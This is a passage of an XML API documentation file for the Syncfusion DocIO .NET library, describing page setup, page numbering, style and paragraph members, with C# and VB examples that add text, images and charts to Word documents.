        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.GetAsLetter(System.Int32)">
            <summary>
            
            </summary>
            <param name="number"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.AppendChar(System.Text.StringBuilder,System.Int32)">
            <summary>
            Adds letter instead of number.
            </summary>
            <param name="builder">String builder object.</param>
            <param name="number">Number to be converted to letter.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.ConvertToLetter(System.Single)">
            <summary>
            Utility metnod. Helps to convert arabic number to \"A\" format.
            </summary>
            <param name="arabic">Arabic number.</param>
            <returns>Sequence of number.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.GenerateNumber(System.Int32@,System.Int32,System.String)">
            <summary>
            
            </summary>
            <param name="value"></param>
            <param name="magnitude"></param>
            <param name="letter"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.Clone">
            <summary>
            Clones itself.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.Close">
            <summary>
            Closes the item.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.ClonePageSize">
            <summary>
            Clone page size
            </summary>
            <returns>PageSize</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.EndnoteNumberFormat">
            <summary>
            Gets / sets endnote numbering format
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.FootnoteNumberFormat">
            <summary>
            Gets / sets footnote numbering format
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.RestartIndexForEndnote">
            <summary>
            Gets / sets the restart index for endnote
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.RestartIndexForFootnotes">
            <summary>
            Gets / sets the restart index for footnotes
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.FootnotePosition">
            <summary>
            Gets / sets footnote position in the document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.EndnotePosition">
            <summary>
            Gets / sets endnote position in the document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.InitialFootnoteNumber">
            <summary>
            Gets / sets the initial footnote number
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.InitialEndnoteNumber">
            <summary>
            Gets / sets the initial endnote number
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.DefaultTabWidth">
            <summary>
            Gets or sets the length of the auto tab.
            </summary>
            <value>The length of the auto tab.</value>
            <remarks>"This property has been deprecated. Use the DefaultTabWidth property of WordDocument class to set default tab width for the document.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.PageSize">
            <summary>
            Gets or sets page size in points.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.Orientation">
            <summary>
            Gets or sets the orientation of the page.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.VerticalAlignment">
            <summary>
            Gets sets the vertical alignment of text on each page in a document or section.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.Margins">
            <summary>
            Gets or sets the distance (in points) between the all four edge of the page and the all four boundary of the body text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.HeaderDistance">
            <summary>
            Gets or sets the distance (in points) between the header and the top of the page.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.FooterDistance">
            <summary>
            Gets or sets the distance (in points) between the footer and the bottom of the page.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.ClientWidth">
            <summary>
            Gets width of client area. Read-only.
            </summary>
            <value><b>float</b> value represents the text rendering area width.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.DifferentFirstPage">
            <summary>
            Gets or sets a value indicating whether a different header or footer is used on the first page. The default is <b>false</b>
            </summary>
            <value><b>True</b> if a different header or footer is used on the first page; otherwise, false</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.DifferentOddAndEvenPages">
            <summary>
            Gets or sets a value indicating whether a different header or footer is used on the odd and even pages. The default is <b>false</b>
            </summary>
            <value><b>True</b> if a different header or footer is used on the odd and even pages; otherwise, false</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.LineNumberingMode">
            <summary>
            Gets or sets the way line numbering runs� that is, whether it starts over at the beginning of a new page or section or runs continuously.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.LineNumberingStep">
            <summary>
            Gets or sets the numeric increment for line numbers. For example, if the CountBy property is set to 5, every fifth line will display the line number.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.LineNumberingStartValue">
            <summary>
            Gets or sets the starting line number.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.LineNumberingDistanceFromText">
            <summary>
            Gets or sets the distance (in points) between the right edge of line numbers and the left edge of the document text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.PageBordersApplyType">
            <summary>
            Gets or sets the value that determine on which pages border is applied.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.PageBorderOffsetFrom">
            <summary>
            Gets or sets the position of page border.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.IsFrontPageBorder">
            <summary>
            Gets or sets a value indicating whether the current page border is the front page border. The default is <b>true</b>.
            </summary>
            <value><b>True</b> if the current page border is front page; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.Borders">
            <summary>
            Gets the page border. Read-only.
            </summary>
            <value>The <see cref="P:Syncfusion.DocIO.DLS.WPageSetup.Borders"/> collection represents the left, right, top and bottom borders of the page</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.Bidi">
            <summary>
            Gets or sets a value indication whether section contains right-to-left text. The default is <b>false</b>.
            </summary>
            <value><b>True</b> if the section contains right-to-left text; otherwise, <b>false</b></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.EqualColumnWidth">
            <summary>
            Get/set Equal column width property.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.PageNumberStyle">
            <summary>
            Gets or sets the page number style.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.PageStartingNumber">
            <summary>
            Gets or sets the starting page number.
            </summary>
            <value>The page starting number.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.RestartPageNumbering">
            <summary>
            Gets or sets a value indicating whether to restart page numbering.
            </summary>
            <value>
            	<b>True</b> if restart page numbering; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.LinePitch">
            <summary>
            Gets or sets the page line pitch.
            </summary>
            <value>The line pitch.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.PitchType">
            <summary>
            Gets or sets the type of the pitch.
            </summary>
            <value>The type of the pitch.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.DrawLinesBetweenCols">
            <summary>
            Gets or sets a value indicating whether to draw lines between columns.
            </summary>
            <value>
            	 if draw lines between columns, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.PageNumbers">
            <summary>
            Gets the page number setup. Read-only.
            </summary>
            <seealso cref="P:Syncfusion.DocIO.DLS.WPageSetup.PageNumbers"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.FirstPageTray">
            <summary>
            Gets or sets  value for first paper source of the current section in paper settings
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPageSetup.OtherPagesTray">
            <summary>
            Gets or sets value for other paper source of the current section in paper settings
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PageNumbers">
            <summary>
            Represents the page numbers in the Word document.
            </summary>
            <example>
            <para>The following code example demonstrates how to chapter numbering in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add the section into Word document
                IWSection section = document.AddSection();
                //Add the page number to document
                section.PageSetup.PageStartingNumber = 1;
                section.PageSetup.RestartPageNumbering = true;
                section.PageSetup.PageNumberStyle = PageNumberStyle.Arabic;
                //Specify the chapter number for heading 1
                section.PageSetup.PageNumbers.HeadingLevelForChapter = HeadingLevel.Heading1;
                //SPecify t he chapter number and page number separator
                section.PageSetup.PageNumbers.ChapterPageSeparator = ChapterPageSeparatorType.Colon;
                //Add a footer paragraph text to the document
                IWParagraph paragraph = section.HeadersFooters.Footer.AddParagraph();
                paragraph.ParagraphFormat.Tabs.AddTab(523f, TabJustification.Right, Syncfusion.DocIO.DLS.TabLeader.NoLeader);
                //Add text for the footer paragraph
                paragraph.AppendText("Copyright Northwind Inc. 2001 - 2016");
                //Add page number field to the document
                paragraph.AppendText("\tPage ");
                paragraph.AppendField("Page", FieldType.FieldPage);
                //Add the paragraph to the text body of the section
                paragraph = section.AddParagraph();
                paragraph.AppendText("First Title with Heading 1 Style");
                //Apply Heading 1 built-in style
                paragraph.ApplyStyle(BuiltinStyle.Heading1);
                WParagraphStyle paraStyle = document.Styles.FindByName("Heading 1") as WParagraphStyle;
                //Add the number format list for the Heading 1 style
                paraStyle.ListFormat.ApplyDefNumberedStyle();
                paraStyle.ListFormat.CurrentListLevel.PatternType = ListPatternType.UpLetter;
                //Add the paragraph
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                //Add the page break 
                paragraph.AppendBreak(Syncfusion.DocIO.DLS.BreakType.PageBreak);
                //Add the another paragraph to section
                paragraph = section.AddParagraph();
                paragraph.AppendText("Second Title with Heading 1 Style");
                //Apply Heading 1 built-in style
                paragraph.ApplyStyle(BuiltinStyle.Heading1);
                //Add the paragraph
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add the section into Word document
                Dim section As IWSection = document.AddSection()
                'Add the page number to document
                section.PageSetup.PageStartingNumber = 1
                section.PageSetup.RestartPageNumbering = True
                section.PageSetup.PageNumberStyle = PageNumberStyle.Arabic
                'Specify the chapter number for heading 1
                section.PageSetup.PageNumbers.HeadingLevelForChapter = HeadingLevel.Heading1
                'SPecify t he chapter number and page number separator
                section.PageSetup.PageNumbers.ChapterPageSeparator = ChapterPageSeparatorType.Colon
                'Add a footer paragraph text to the document
                Dim paragraph As IWParagraph = section.HeadersFooters.Footer.AddParagraph()
                paragraph.ParagraphFormat.Tabs.AddTab(523F, TabJustification.Right, Syncfusion.DocIO.DLS.TabLeader.NoLeader)
                'Add text for the footer paragraph
                paragraph.AppendText("Copyright Northwind Inc. 2001 - 2016")
                'Add page number field to the document
                paragraph.AppendText(vbTab &amp; "Page ")
                paragraph.AppendField("Page", FieldType.FieldPage)
                'Add the paragraph to the text body of the section
                paragraph = section.AddParagraph()
                paragraph.AppendText("First Title with Heading 1 Style")
                'Apply Heading 1 built-in style
                paragraph.ApplyStyle(BuiltinStyle.Heading1)
                Dim paraStyle As WParagraphStyle = TryCast(document.Styles.FindByName("Heading 1"), WParagraphStyle)
                'Add the number format list for the Heading 1 style
                paraStyle.ListFormat.ApplyDefNumberedStyle()
                paraStyle.ListFormat.CurrentListLevel.PatternType = ListPatternType.UpLetter
                'Add the paragraph
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                'Add the page break 
                paragraph.AppendBreak(Syncfusion.DocIO.DLS.BreakType.PageBreak)
                'Add the another paragraph to section
                paragraph = section.AddParagraph()
                paragraph.AppendText("Second Title with Heading 1 Style")
                'Apply Heading 1 built-in style
                paragraph.ApplyStyle(BuiltinStyle.Heading1)
                'Add the paragraph
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumbers.m_chapterPageSeparator">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PageNumbers.m_headingLevelForChapter">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PageNumbers.#ctor">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.PageNumbers"/> class.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PageNumbers.ChapterPageSeparator">
            <summary>
            Gets or sets the separator between chapter number and page number.
            </summary>
            <value>
            The <see cref="T:Syncfusion.DocIO.DLS.ChapterPageSeparatorType"/> member that specifies the numbering separator.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PageNumbers.HeadingLevelForChapter">
            <summary>
            Gets or sets the heading level to include chapter number along with page number.
            </summary>
            <value>
            The <see cref="T:Syncfusion.DocIO.DLS.HeadingLevel"/> member that specifies the heading level of the chapter.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WParagraph">
            <summary>
            Represents the paragraph of text in the Word document.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWParagraph">
            <summary>
            Represents a paragraph inside a Section.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IStyleHolder">
            <summary>
            Represents style holders
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IStyleHolder.ApplyStyle(System.String)">
            <summary>
            Applies a new style.
            </summary>
            <param name="styleName">The <b>string</b> that represents the style name.</param>
            <remarks>Specified style must exists in Document.Styles collection</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IStyleHolder.ApplyStyle(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Applies the built-in style.
            </summary>
            <param name="builtinStyle">The <see cref="T:Syncfusion.DocIO.DLS.BuiltinStyle"/> member that specifies the built-in style.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IStyleHolder.StyleName">
            <summary>
            Gets the style name.
            </summary>
            <value>The <b>string</b> that represents the style name.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.ApplyStyle(System.String)">
            <summary>
            Applies the style with the specified name to the paragraph.
            </summary>
            <param name="styleName">The <b>string</b> that represents the style name.</param>
            <remarks>The specified style must exists in <see cref="P:Syncfusion.DocIO.DLS.WordDocument.Styles"/> collection.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.ApplyStyle(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Applies the specified built-in style to the paragraph.
            </summary>
            <param name="builtinStyle">The <see cref="T:Syncfusion.DocIO.DLS.BuiltinStyle"/> member that specifies the style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendText(System.String)">
            <summary>
            Appends the specified text to the end of the paragraph.
            </summary>
            <param name="text">The <b>string</b> that specifies the text to be appended.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWTextRange"/> instance that represents the newly added text.</returns>
            <example>The following example illustrates how to append text to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add new text to the paragraph
                IWTextRange text = paragraph.AppendText("A new text is added to the paragraph.");
                text.CharacterFormat.FontSize = 14;
                text.CharacterFormat.Bold = true;
                text.CharacterFormat.TextColor = Color.Green;
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add new text to the paragraph
                Dim text As IWTextRange = paragraph.AppendText("A new text is added to the paragraph.")
                text.CharacterFormat.FontSize = 14
                text.CharacterFormat.Bold = True
                text.CharacterFormat.TextColor = Color.Green
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendPicture(System.Drawing.Image)">
            <summary>
            Appends the specified image to the end of paragraph.
            </summary>
            <param name="image">The <see cref="T:System.Drawing.Image"/> to be added.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWPicture"/> instance that represents the newly added image.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin applications.</remarks>
            <example>The following example illustrates how to append image to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add image to  the paragraph
                IWPicture picture = paragraph.AppendPicture(Image.FromFile("Image.png"));
                //Set height and width for the image
                picture.Height = 100;
                picture.Width = 100;
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add image to  the paragraph
                Dim picture As IWPicture = paragraph.AppendPicture(Image.FromFile("Image.png"))
                'Set height and width for the image
                picture.Height = 100
                picture.Width = 100
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendPicture(System.Byte[])">
            <summary>
            Appends the image specified by the <see cref="T:System.Byte"/> array to the end of paragraph.
            </summary>
            <param name="imageBytes">The <see cref="T:System.Byte"/> array of the image to be added.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWPicture"/> instance that represents the newly added image.</returns>
            <example>The following example illustrates how to append image to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph firstParagraph = section.AddParagraph();
                //Get the image and convert to byte array.
                Image image = Image.FromFile("Image.png");
                MemoryStream stream = new MemoryStream();
                image.Save(stream, System.Drawing.Imaging.ImageFormat.Png);
                byte[] imageBytes = stream.ToArray();
                //Add image to the paragraph
                IWPicture picture = firstParagraph.AppendPicture(imageBytes);
                //Set height and width for the image
                picture.Height = 100;
                picture.Width = 100;
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim firstParagraph As IWParagraph = section.AddParagraph()
                'Get the image and convert to byte array.
                Dim image__1 As Image = Image.FromFile("Image.png")
                Dim stream As New MemoryStream()
                image__1.Save(stream, System.Drawing.Imaging.ImageFormat.Png)
                Dim imageBytes As Byte() = stream.ToArray()
                'Add image to the paragraph
                Dim picture As IWPicture = firstParagraph.AppendPicture(imageBytes)
                'Set height and width for the image
                picture.Height = 100
                picture.Width = 100
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendChart(System.Object[][],System.Single,System.Single)">
            <summary>
            Appends a chart to the end of the paragraph with the specified data, width and height.
            </summary>
            <param name="data">The two-dimensional <see cref="T:System.Object"/> array that specifies the data for chart.</param>
            <param name="width">The <b>float</b> that represents the width for chart.</param>
            <param name="height">The <b>float</b> that represents the height for chart.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WChart"/> instance that represents the newly added chart.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin applications.</remarks>
            <example> The following example illustrates how to append new chart to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Input data for chart
                object[][] data = new object[6][];
                for (int i = 0; i &lt; 6; i++)
                    data[i] = new object[3];
                data[0][0] = "";
                data[1][0] = "Gravad lax";
                data[2][0] = "Louisiana Hot spiced Okara";
                data[3][0] = "Mascarpone Fabioli";
                data[4][0] = "Wimmers gute SemmelKnodel";
                data[5][0] = "Maxilaku";
                data[0][1] = "Sum of Purchases";
                data[1][1] = 286;
                data[2][1] = 680;
                data[3][1] = 288;
                data[4][1] = 200;
                data[5][1] = 731;
                data[0][2] = "Sum of Future Expenses";
                data[1][2] = 1300;
                data[2][2] = 700;
                data[3][2] = 1280;
                data[4][2] = 1200;
                data[5][2] = 2660;        ///     
                //Create and Append chart to the paragraph
                WChart chart = paragraph.AppendChart(data, 470, 300);
                //Set chart type and title
                chart.ChartTitle = "Purchase Details";
                chart.ChartTitleArea.FontName = "Calibri";
                chart.ChartTitleArea.Size = 14;
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None;          
                //Set series type 
                chart.Series[0].SerieType = OfficeChartType.Line_Markers;
                chart.Series[1].SerieType = OfficeChartType.Bar_Clustered;
                chart.PrimaryCategoryAxis.Title = "Products";
                chart.PrimaryValueAxis.Title = "In Dollars";
                //Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom;
                //Save the document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Input data for chart
                Dim data As Object()() = New Object(5)() {}
                For i As Integer = 0 To 5
                    data(i) = New Object(2) {}
                Next
                data(0)(0) = ""
                data(1)(0) = "Gravad lax"
                data(2)(0) = "Louisiana Hot spiced Okara"
                data(3)(0) = "Mascarpone Fabioli"
                data(4)(0) = "Wimmers gute SemmelKnodel"
                data(5)(0) = "Maxilaku"
                data(0)(1) = "Sum of Purchases"
                data(1)(1) = 286
                data(2)(1) = 680
                data(3)(1) = 288
                data(4)(1) = 200
                data(5)(1) = 731
                data(0)(2) = "Sum of Future Expenses"
                data(1)(2) = 1300
                data(2)(2) = 700
                data(3)(2) = 1280
                data(4)(2) = 1200
                data(5)(2) = 2660
                'Create and Append chart to the paragraph
                Dim chart As WChart = paragraph.AppendChart(data, 470, 300)
                'Set chart type and title
                chart.ChartTitle = "Purchase Details"
                chart.ChartTitleArea.FontName = "Calibri"
                chart.ChartTitleArea.Size = 14
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None
                'Set series type 
                chart.Series(0).SerieType = OfficeChartType.Line_Markers
                chart.Series(1).SerieType = OfficeChartType.Bar_Clustered
                chart.PrimaryCategoryAxis.Title = "Products"
                chart.PrimaryValueAxis.Title = "In Dollars"
                'Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom
                'Save the document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendChart(System.Single,System.Single)">
            <summary>
            Appends chart to the end of the paragraph with the specified width and height.
            </summary>
            <param name="width">The <b>float</b> that represents the width for chart.</param>
            <param name="height">The <b>float</b> that represents the height for chart.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WChart"/> instance that represents the newly added chart.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin applications.</remarks>
            <example> The following example illustrates how to append new chart to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Create and Append chart to the paragraph
                WChart chart = paragraph.AppendChart(446, 270);
                //Set chart type
                chart.ChartType = OfficeChartType.Pie;
                //Set chart title
                chart.ChartTitle = "Best Selling Products";
                chart.ChartTitleArea.FontName = "Calibri";
                chart.ChartTitleArea.Size = 14;
                //Set data for chart
                chart.ChartData.SetValue(1, 1, "");
                chart.ChartData.SetValue(1, 2, "Sales");
                chart.ChartData.SetValue(2, 1, "Cote de Blaye");
                chart.ChartData.SetValue(2, 2, 141.396);
                chart.ChartData.SetValue(3, 1, "Thuringer Rostbratwurst");
                chart.ChartData.SetValue(3, 2, 80.368);
                chart.ChartData.SetValue(4, 1, "Raclette Courdavault");
                chart.ChartData.SetValue(4, 2, 71.155);
                chart.ChartData.SetValue(5, 1, "Tarte au sucre");
                chart.ChartData.SetValue(5, 2, 47.234);
                chart.ChartData.SetValue(6, 1, "Camembert Pierrot");
                chart.ChartData.SetValue(6, 2, 46.825);
                chart.ChartData.SetValue(7, 1, "Gnocchi di nonna Alice");
                chart.ChartData.SetValue(7, 2, 42.593);
                chart.ChartData.SetValue(8, 1, "Manjimup Dried Apples");
                chart.ChartData.SetValue(8, 2, 41.819);
                chart.ChartData.SetValue(9, 1, "Alice Mutton");
                chart.ChartData.SetValue(9, 2, 32.698);
                chart.ChartData.SetValue(10, 1, "Carnarvon Tigers");
                chart.ChartData.SetValue(10, 2, 29.171);
                chart.ChartData.SetValue(11, 1, "R�ssle Sauerkraut.");
                chart.ChartData.SetValue(11, 2, 25.696);
                //Create a new chart series with the name �Sales�
                IOfficeChartSerie pieSeries = chart.Series.Add("Sales");
                pieSeries.Values = chart.ChartData[2, 2, 11, 2];
                //Set data label
                pieSeries.DataPoints.DefaultDataPoint.DataLabels.IsValue = true;
                pieSeries.DataPoints.DefaultDataPoint.DataLabels.Position = OfficeDataLabelPosition.Outside;
                //Set background color
                chart.ChartArea.Fill.ForeColor = Color.FromArgb(242, 242, 242);
                chart.PlotArea.Fill.ForeColor = Color.FromArgb(242, 242, 242);
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None;
                //Set category labels
                chart.PrimaryCategoryAxis.CategoryLabels = chart.ChartData[2, 1, 11, 1];            
                //Save the document
